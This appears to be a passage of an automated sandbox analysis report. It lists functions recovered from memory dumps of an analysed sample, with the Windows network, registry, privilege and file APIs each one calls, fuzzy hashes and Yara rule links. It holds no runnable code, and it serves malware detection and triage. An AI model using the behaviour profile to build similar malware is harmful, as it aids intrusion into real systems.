Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004F1485

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: a31296c3a826984b666b0e69756595a01f441e263e04ebdea4c214e02858cfad
Instruction ID: c0a586e978fcf26bcb1e419651ffef412cb80a3ddf0301d74d7ab36b67003a0a
Opcode Fuzzy Hash: a31296c3a826984b666b0e69756595a01f441e263e04ebdea4c214e02858cfad
Instruction Fuzzy Hash: B921C3715097C0AFDB238F21DC55A52FFB4EF17314F0980DBEA848B163D2699909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004F256E, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F25CF

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 483f58bfeb78299d1f085401859b55635b3e54b1a95256d4bae5dbf1e3fb5723
Instruction ID: 9d72be99731df0958612a87da03f3da47e60ef84f16ba6ec0b1a26cdc669bb9f
Opcode Fuzzy Hash: 483f58bfeb78299d1f085401859b55635b3e54b1a95256d4bae5dbf1e3fb5723
Instruction Fuzzy Hash: 5E11BF71500704EFEB20CF55CD85FA6FBE8EF04720F14846BEA09DB241D6B4A9448A75

Uniqueness

Uniqueness Score: -1.00%

Function 004F10DA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004F1123

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 80c7e243ac4996e81c22eccc3e85903a9f0d555ad3f34b6fb30fc16371af0187
Instruction ID: 9fb29c181e9d9d3e70d3ef78838f79f393e7a80651a9396bd27436384158610a
Opcode Fuzzy Hash: 80c7e243ac4996e81c22eccc3e85903a9f0d555ad3f34b6fb30fc16371af0187
Instruction Fuzzy Hash: 98119E35500704DFEB20CF55D984B62FBE4EF08320F0884AADE4A8B662D375E804DF62

Uniqueness

Uniqueness Score: -1.00%

Function 004F0D66, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 004F0D98

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: beafc88519ae53d1d4b9a165fb469bfa043f52dbbb1991003862a05b84e03c3d
Instruction ID: b4bba22dbea60c2bf335d03b296839b814f4b0918c325aaee249373a925ddc9b
Opcode Fuzzy Hash: beafc88519ae53d1d4b9a165fb469bfa043f52dbbb1991003862a05b84e03c3d
Instruction Fuzzy Hash: DC01D175900344DFEB20CF55D885BA6FFA4EF40320F18C4ABDE098B302D279A444CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004F144A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004F1485

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 51e7b4ce279719649f9261ea8970eee62e4d5ceb07117dbc96f8083dc0b86183
Instruction ID: d18d7e3d961bccd1dce78bab38c9d41a66c2090f8b4e77fb7ce72a28e2b643b7
Opcode Fuzzy Hash: 51e7b4ce279719649f9261ea8970eee62e4d5ceb07117dbc96f8083dc0b86183
Instruction Fuzzy Hash: 9801AD31900744DFEB20CF45D884B62FBA0EF54720F18C09ADE890B722D27AA458DF62

Uniqueness

Uniqueness Score: -1.00%

Function 003CAE67, Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

o[, xrefs: 003CB0FA
o[, xrefs: 003CB0DE
k[, xrefs: 003CAFE1

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: o[$ o[$k[
API String ID: 0-2509477004
Opcode ID: e49e555add77b16b1ad9f94a9d1a45fddf465c72209f019b94b3116792e9be50
Instruction ID: 2eef95cc06d23c2603592a05b3595952b5461249be66aa3cb82b327b2e66638c
Opcode Fuzzy Hash: e49e555add77b16b1ad9f94a9d1a45fddf465c72209f019b94b3116792e9be50
Instruction Fuzzy Hash: 8381BD317006169BDB04EB74D891BAEBBA2FFC5300F54852DE1099B6A5CF75AC068BD2

Uniqueness

Uniqueness Score: -1.00%

Function 003C94F0, Relevance: 3.9, Strings: 3, Instructions: 133COMMON

Download Yara Rule

Strings

, xrefs: 003C960E
*_qq, xrefs: 003C953D
p>[, xrefs: 003C9506

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: $*_qq$p>[
API String ID: 0-217091050
Opcode ID: 18afba1c596fe5e2c770cba2fb98a1d158b4b9b2ffa987d79fdaac1a252f4811
Instruction ID: 8f9cf3addef56c1e2b5965dd3fe845a765d25b2e05d4df29f1db8f13cb1d05dc
Opcode Fuzzy Hash: 18afba1c596fe5e2c770cba2fb98a1d158b4b9b2ffa987d79fdaac1a252f4811
Instruction Fuzzy Hash: 5041B230F041058BDB02DF65C888BAEB7BABB85310F2BC46BC516DB645DA35DD238B91

Uniqueness

Uniqueness Score: -1.00%

Function 003C7CF8, Relevance: 2.9, Strings: 2, Instructions: 437COMMON

Download Yara Rule

Strings

L![, xrefs: 003C80B7
![, xrefs: 003C801A

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: L![$![
API String ID: 0-78217734
Opcode ID: 194940bf6db198061e1e93e56db5e2a5f92d5334fa9594a42148020a857f62b4
Instruction ID: 151cf4fc0bc5557a7c55179bc493901c78eb298091cb42c1b546ecd97afbfae3
Opcode Fuzzy Hash: 194940bf6db198061e1e93e56db5e2a5f92d5334fa9594a42148020a857f62b4
Instruction Fuzzy Hash: 25020230A00605CFCB15EB68C584AA9B7F6FF89300F6589A9E84ADB751DB30ED41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 003C2DD0, Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

, xrefs: 003C2EEE
*_qq, xrefs: 003C2E1D

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: $*_qq
API String ID: 0-996541083
Opcode ID: 5aec473d83ee6a181acc4900694864cb1b317a4548502a339e85a68c163f756e
Instruction ID: 775a47ef4682048c457b180688b6ffc9625e584e3a30fc10c5b2a626edcdec2c
Opcode Fuzzy Hash: 5aec473d83ee6a181acc4900694864cb1b317a4548502a339e85a68c163f756e
Instruction Fuzzy Hash: 9D412731F082198FDB12DF79C880AAFB776ABC1310B65C57ED556EBA05C236DC428781

Uniqueness

Uniqueness Score: -1.00%

Function 003C8940, Relevance: 2.6, Strings: 2, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 003C8A57
T0[, xrefs: 003C894B

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: T0[$r*+
API String ID: 0-1086674186
Opcode ID: f0cfc5f78f9b9452913f300cc745a472ec75f8f2bcc28eec240455e78fb727c8
Instruction ID: 2866f342b8cb2db0e8e3228e391183bba8d91b73cf7b9a0484a80b906af197ef
Opcode Fuzzy Hash: f0cfc5f78f9b9452913f300cc745a472ec75f8f2bcc28eec240455e78fb727c8
Instruction Fuzzy Hash: B6411530A00209DFCB59DFA4C545BBEBBB5BB45300F20816AD402E7660DB359F45EB52

Uniqueness

Uniqueness Score: -1.00%

Function 003CC758, Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

s[, xrefs: 003CC7A3
s[, xrefs: 003CC7D7

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: s[$s[
API String ID: 0-1544862757
Opcode ID: a11e6f03e2f717e8dd1d6dda7297943bc494a6b043b33c3750822008cf6cb68b
Instruction ID: 9a753faf084af01dedf51704ba1f9b2d2b548e98e9865d634387735a733a1027
Opcode Fuzzy Hash: a11e6f03e2f717e8dd1d6dda7297943bc494a6b043b33c3750822008cf6cb68b
Instruction Fuzzy Hash: C011E3307203509FD705AB38B894B2A37D7EBC9B00F194078E006EB359DB749C42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004F2A51, Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E40), ref: 004F2B67

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: daa5fe3d04a4a5346b1d311ef8fb8bad3c7f510ac6cf2faf9aeb56a8812096b2
Instruction ID: 35064faec84b00980a464d11d3218390fcb95c6e7a0804b024f27e2ce79039f3
Opcode Fuzzy Hash: daa5fe3d04a4a5346b1d311ef8fb8bad3c7f510ac6cf2faf9aeb56a8812096b2
Instruction Fuzzy Hash: 4D419E7154D3C1AFE7238B208C54BA2BFB8EF13214F0944DBE9848F193D269A949C772

Uniqueness

Uniqueness Score: -1.00%

Function 004F1590, Relevance: 1.6, APIs: 1, Instructions: 128networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E40,?,?), ref: 004F1686

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 2bdce273ccbc4bccc355cfeff6d614ec3e65c3ca471a05da5ef409990f3d7fe4
Instruction ID: 8c1d7b98869de13238989376527632809fac9a6e0d7eef96c8a026a959014723
Opcode Fuzzy Hash: 2bdce273ccbc4bccc355cfeff6d614ec3e65c3ca471a05da5ef409990f3d7fe4
Instruction Fuzzy Hash: 9841106540E3C0AFD3138B358C61A61BF74EF87614B0E85CBE884CF5A3D219690AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 004F0390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000E40), ref: 004F045E

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8145e8c584df86cf101d0aca31975155ddc25d1de279b9bcfee1c6c9c964b4ab
Instruction ID: 593db89285abb8dd143f7997d37a4d838720d6ecb5e3bd22377a9b3d2cd6ef2b
Opcode Fuzzy Hash: 8145e8c584df86cf101d0aca31975155ddc25d1de279b9bcfee1c6c9c964b4ab
Instruction Fuzzy Hash: C631D372004384AFF722CF10CC45FA6FBB8EF06714F04859EFA859B192D2B5A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F07F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 004F0899

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4d558aa1591b299c1f428d352e4555c6a0f2dcc00b9e542e5a581d8ecb6e3357
Instruction ID: 0f3813996a96230f420e2744974e63b058a6ea3b2b6b5b62b4d9dc45cbdd2dae
Opcode Fuzzy Hash: 4d558aa1591b299c1f428d352e4555c6a0f2dcc00b9e542e5a581d8ecb6e3357
Instruction Fuzzy Hash: 5F318F71504384AFE722CB65CC44FA6BBE8EF45250F0884AEE9898B252D365E809DB71

Uniqueness

Uniqueness Score: -1.00%

Function 0019AA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0019AAB1

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ae4884c596db8e482f9ef0290657ae3d824a425e494e23c4a5f0cd4f3f481e0d
Instruction ID: 80bcd75949e7336188d13b71ea7364f6f74b09d7d461962876e54d375bb356d5
Opcode Fuzzy Hash: ae4884c596db8e482f9ef0290657ae3d824a425e494e23c4a5f0cd4f3f481e0d
Instruction Fuzzy Hash: 0431A072544384AFE722CB11CC45FA7BBACEF06310F08859AF9858B152D265A949CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0019AF50, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E40,?,?), ref: 0019AFEA

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6210d9bcceb1c974f3871761741f5a2efb8594a206a612db02f438b5800e8360
Instruction ID: b5b05c643783b8f5e8100f3cf18c116438241cde8af242fd047cd7a28056443a
Opcode Fuzzy Hash: 6210d9bcceb1c974f3871761741f5a2efb8594a206a612db02f438b5800e8360
Instruction Fuzzy Hash: 79314CA540E7C06FD7138B358C65B26BFB4EF47610F0A41DBD884CB5A3D229A91DC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 004F2360, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F23FD

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 2589f37bbec04ad7ecb028e63645343a134aad92153823d61869671f05ab1276
Instruction ID: 0ae4e5009fe3526b9186ca274efafde5d0a5a67b51868ccf983257426b4dac58
Opcode Fuzzy Hash: 2589f37bbec04ad7ecb028e63645343a134aad92153823d61869671f05ab1276
Instruction Fuzzy Hash: 423105B2405380AFE712CF20DC45BA6BFB8EF06310F08849BE984CB193C2659905C765

Uniqueness

Uniqueness Score: -1.00%

Function 004F00F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 004F019D

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 6f02aaaeb305d303cdb35f5008ac6c1e34b9ad3bcb89c451ae163315f3f268ba
Instruction ID: a5706daece575a38e2038544228e48969de6cc891ef686f5b98c5a5056a2cc62
Opcode Fuzzy Hash: 6f02aaaeb305d303cdb35f5008ac6c1e34b9ad3bcb89c451ae163315f3f268ba
Instruction Fuzzy Hash: 77318171509784AFE711CB25DD45B96BFE8EF06310F08849BE984CB293D375A908C765

Uniqueness

Uniqueness Score: -1.00%

Function 0019AAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 0019ABB4

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4945f3d67762d131f8052276738164192af6fd87ede7ea08a4b522e8d89f07fa
Instruction ID: 2156d38262a7e163e4c25d82b768e059ea5f389c393107867323366b0bfc3e11
Opcode Fuzzy Hash: 4945f3d67762d131f8052276738164192af6fd87ede7ea08a4b522e8d89f07fa
Instruction Fuzzy Hash: 8D31A475509384AFEB22CF21CC45F92BFA8EF06310F08849AE985CB153D364E949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004F2C72, Relevance: 1.6, APIs: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E40,?,?), ref: 004F2D22

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 1ac3d47096d005f2a7dbc5f8f65bb44895ce0b5eb8481e3e4cedec2d582628fe
Instruction ID: 3ce6353e0786ebd654e215a5e62da55c5e259ce1d0c34a540a5b6f55212d72d0
Opcode Fuzzy Hash: 1ac3d47096d005f2a7dbc5f8f65bb44895ce0b5eb8481e3e4cedec2d582628fe
Instruction Fuzzy Hash: 1831AE7180E3C05FD3038B218C51B66BFB4EF47610F0A80CBD884CF2A3D2256919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 004F04AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F055C

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0bf079204b91090f165431daaca2a9c051fc3c59702407f93a3a9fd5be6b200b
Instruction ID: ed4d2997550067bec8177500e3f7eab53ff484e2511f1b58f5d3d7a59b6b3189
Opcode Fuzzy Hash: 0bf079204b91090f165431daaca2a9c051fc3c59702407f93a3a9fd5be6b200b
Instruction Fuzzy Hash: 5A31A271509384AFE722CB25DC44F92BFF8EF06310F0885DAE9858B193D264A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0019A120, Relevance: 1.6, APIs: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E40,?,?), ref: 0019A1C2

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 8a38ec3f005cba38044ca7cb29e280241c6b56a9239b6170c12c3f24b2a3e0d1
Instruction ID: 91136e05afc5b1181755c64470b715801e48cd4a227f63cc234b87b04ac1eaeb
Opcode Fuzzy Hash: 8a38ec3f005cba38044ca7cb29e280241c6b56a9239b6170c12c3f24b2a3e0d1
Instruction Fuzzy Hash: 6731B17140D3C06FD3128B358C51B66BFB4EF87620F1985DBD9848F293D229A909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004F2AC2, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E40), ref: 004F2B67

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: d052608e78e1aa0447839b67742e2d769eddc85fa0a0df38fe95e0ae9fbe7fda
Instruction ID: c4f6ac61b0db81f5075371719d816010efc4ff7029dcf53ae9f523e3d90749c0
Opcode Fuzzy Hash: d052608e78e1aa0447839b67742e2d769eddc85fa0a0df38fe95e0ae9fbe7fda
Instruction Fuzzy Hash: 1E21D171540304AFFB20DF10CD85FB6FBACEF04710F04445AFE489A281D6B9AA458B75

Uniqueness

Uniqueness Score: -1.00%

Function 004F1EFF, Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 004F1FA6

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 4f30cfab9af43beed80852494d81daa88c0b3011185fc56e77d0c8da504a8cd1
Instruction ID: c4bc91274fbfea77baa410247218d7c8677d82e174e40211cf25c08583c45858
Opcode Fuzzy Hash: 4f30cfab9af43beed80852494d81daa88c0b3011185fc56e77d0c8da504a8cd1
Instruction Fuzzy Hash: 1431A072405384EFE722CB55CC45F56FFE8EF06310F08859AE9848B252D365A908CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004F02AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000E40), ref: 004F0353

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 271833358102ccf4e2e37766d5ad661723e566d24bfd06051bdd39654f95efbd
Instruction ID: 3a21f1561f7cce2fa7121c19f93e88a7a2f40ce9e39a529943dbebf1fd643a72
Opcode Fuzzy Hash: 271833358102ccf4e2e37766d5ad661723e566d24bfd06051bdd39654f95efbd
Instruction Fuzzy Hash: 3621B572409380AFE7228F10DC45FA6BFB4EF46310F0884DAEA849B193D275A949CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004F1E12, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 004F1E9D

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 3ef01c3099e098d05b79752937c0dc9aaac3659bf1e54868e1344fbfd125fc98
Instruction ID: 854bd358b5fbf5fcedc347b5065ec766dcd23d4adb2c30ffb50c5a1e37bb2fc3
Opcode Fuzzy Hash: 3ef01c3099e098d05b79752937c0dc9aaac3659bf1e54868e1344fbfd125fc98
Instruction Fuzzy Hash: 812183B1505784EFE721CB55DC45F66FFA8EF05310F0884AEED888B292D375A904CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004F08F0, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F0985

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3a94af8229b235692d4bcf0da74b784e72813037ff291e6659b38e8b5b17be20
Instruction ID: 48c457739a1a8976954d9aa1acb2755ccfeae592d71e228b03f1a0153fa5fdc4
Opcode Fuzzy Hash: 3a94af8229b235692d4bcf0da74b784e72813037ff291e6659b38e8b5b17be20
Instruction Fuzzy Hash: 092107B6508784AFE712CB159C41FA3BFA8EF46320F0881DBE9848B193D264A909C775

Uniqueness

Uniqueness Score: -1.00%

Function 004F16B2, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 004F173E

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: b2bc8e8b7b3adb8d75eaee416bde75b04069a29151cd995bbf62ed0cd7203ea6
Instruction ID: 6c2b3a0c7c651725c7104198f9e502649af4db512a34453657708c9f9b5e1041
Opcode Fuzzy Hash: b2bc8e8b7b3adb8d75eaee416bde75b04069a29151cd995bbf62ed0cd7203ea6
Instruction Fuzzy Hash: 1A217E71505784AFE722CF51DC45F96FFA8EF05220F04849EEA898B692D375A808CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004F05B0, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 004F064E

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 5d290aa429b75e732c2b9e7ce3b8778f7cdcb41a525532620ea98b075004088b
Instruction ID: bc4e7aab0b5ecff79702b265e0b4263d88413a5caaf27a6395cace4110a5699d
Opcode Fuzzy Hash: 5d290aa429b75e732c2b9e7ce3b8778f7cdcb41a525532620ea98b075004088b
Instruction Fuzzy Hash: 69217F7540E3C0AFD3128B758C55B62BFB4EF47610F1A81CBD8848F6A3D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 004F0C58, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E40), ref: 004F0CEF

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 457a9155234120d154c26ee29aae5b20962b4740f43f59fd68bd443115b84358
Instruction ID: 12f719ffb8e9740c349ef1d3ba18ec24a440b521ef39cd17d2c23fb0f128965b
Opcode Fuzzy Hash: 457a9155234120d154c26ee29aae5b20962b4740f43f59fd68bd443115b84358
Instruction Fuzzy Hash: 94210A71204384AFE721CB15DC45FA3BFB8DF42310F0880DAFA848F192D275A945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004F081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 004F0899

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 60fb30d55fea6969f9a52628416b6bdf7cfb7974c90ae684b6f1f9109e28ed64
Instruction ID: 41aa24b3f9729010e0c9a67f1f13f91cd467d1c836fb8383bf57d6225dc2fc17
Opcode Fuzzy Hash: 60fb30d55fea6969f9a52628416b6bdf7cfb7974c90ae684b6f1f9109e28ed64
Instruction Fuzzy Hash: 4121AE71500304EFEB20DF65CC45BA6FBE8EF08750F04846AEA898B242D375E804CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004F0B79, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F0C10

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 52481dd67978884020b5b6b59cf1eb13ff44e2ea37672796635995623f6ad6d1
Instruction ID: f8a3edc31d7d407d41e74733664b719f55179171c0570c91b4cf9da5a9f1a9fe
Opcode Fuzzy Hash: 52481dd67978884020b5b6b59cf1eb13ff44e2ea37672796635995623f6ad6d1
Instruction Fuzzy Hash: F121C1B2504384AFE721CF11CC45F63BBA8EF45310F08859AFA859B292D264E908CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004F03CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000E40), ref: 004F045E

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e7a5c3fbce78a97a37b32b39711e25ffe0a06f3ff8b79ddaec0fc85f9de57ae0
Instruction ID: c160858efc2dc5b87bb227bede55e4e8f2bca6821bdcd0bb2d33e632da33e8b2
Opcode Fuzzy Hash: e7a5c3fbce78a97a37b32b39711e25ffe0a06f3ff8b79ddaec0fc85f9de57ae0
Instruction Fuzzy Hash: 3521D072100304AFFB21DF11CC81FB6FBA8EF44710F00855AFA459A281D6B5A9498B71

Uniqueness

Uniqueness Score: -1.00%

Function 004F09C0, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F0A51

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: ed721990cf51dfb6ac432de6971cdfff249e02b891b47a1d34dbdaf6b38027fe
Instruction ID: 0fbf84b9963115be95bc232857cd11058d46fab812600ba0d67ba9de2eaa6d64
Opcode Fuzzy Hash: ed721990cf51dfb6ac432de6971cdfff249e02b891b47a1d34dbdaf6b38027fe
